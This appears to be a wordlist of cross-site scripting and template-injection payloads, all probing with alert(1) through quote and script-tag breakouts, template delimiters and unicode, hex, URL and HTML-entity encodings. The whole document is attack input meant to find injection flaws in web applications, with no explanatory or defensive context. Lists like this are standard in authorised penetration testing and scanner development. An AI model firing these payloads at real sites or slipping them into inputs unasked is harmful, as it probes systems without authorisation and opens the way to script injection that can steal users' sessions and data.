';alert(1)//
";alert(1)//
</script><script>alert(1)</script>
${alert(1)}
<%= alert(1) %>
{{alert(1)}}
#{alert(1)}
${{alert(1)}}
{{=alert(1)}}
[[alert(1)]]
@alert(1)
&alert(1);
\u0061lert(1)
\x61lert(1)
%61lert(1)
&#97;lert(1)
&#x61;lert(1)
\u{61}lert(1)
+alert(1)
-alert(1)
!alert(1)
~alert(1)
(alert(1))
[alert(1)]
{alert(1)}
/alert(1)/
;alert(1)
,alert(1)
.alert(1)
?alert(1)
:alert(1)
|alert(1)
^alert(1)
&alert(1)
<alert(1)
>alert(1)
=alert(1)
`alert(1)`
'alert(1)'
"alert(1)"
\alert(1)
@alert(1)
#alert(1)
$alert(1)
%alert(1)
*alert(1)
_alert(1)
alert(1)
window.alert(1)
top.alert(1)
